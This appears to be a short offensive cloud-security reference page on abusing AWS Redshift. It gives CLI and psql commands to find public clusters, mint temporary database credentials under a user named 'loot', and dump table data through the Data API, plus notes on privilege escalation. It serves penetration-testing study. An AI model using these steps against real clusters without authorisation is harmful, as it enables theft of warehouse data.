Redshift is the data warehouse, so it concentrates exactly the data worth taking. A principal with redshift:GetClusterCredentials mints a temporary database user and password for a cluster, auto-creating the user where allowed, which turns an IAM foothold into warehouse access without any stored password. Publicly accessible clusters with loose security groups are reachable directly, and the Redshift Data API runs SQL through the control plane alone.
Minting credentials and connecting#
aws redshift describe-clusters \
--query 'Clusters[?PubliclyAccessible==`true`].[ClusterIdentifier,Endpoint.Address]'
aws redshift get-cluster-credentials \
--cluster-identifier <c> --db-user loot --auto-create --db-name dev
psql "host=<ep> port=5439 dbname=dev user=IAM:loot password=<temp>"
Querying through the Data API#
aws redshift-data execute-statement --cluster-identifier <c> \
--database dev --sql 'select * from users limit 100'
aws redshift-data get-statement-result --id <stmt-id>
Exploitation notes#
GetClusterCredentialswith--auto-createand a broadDbGroupsgrant can land you in a privileged database group.- The Data API needs no network path to the cluster, only IAM, so it works from anywhere the credentials do.
- Redshift Spectrum reads S3 through external schemas, extending access to lake data referenced by the warehouse.
Tools#
- AWS CLI (
redshift get-cluster-credentials,redshift-data execute-statement). - psql: native client once credentials are minted.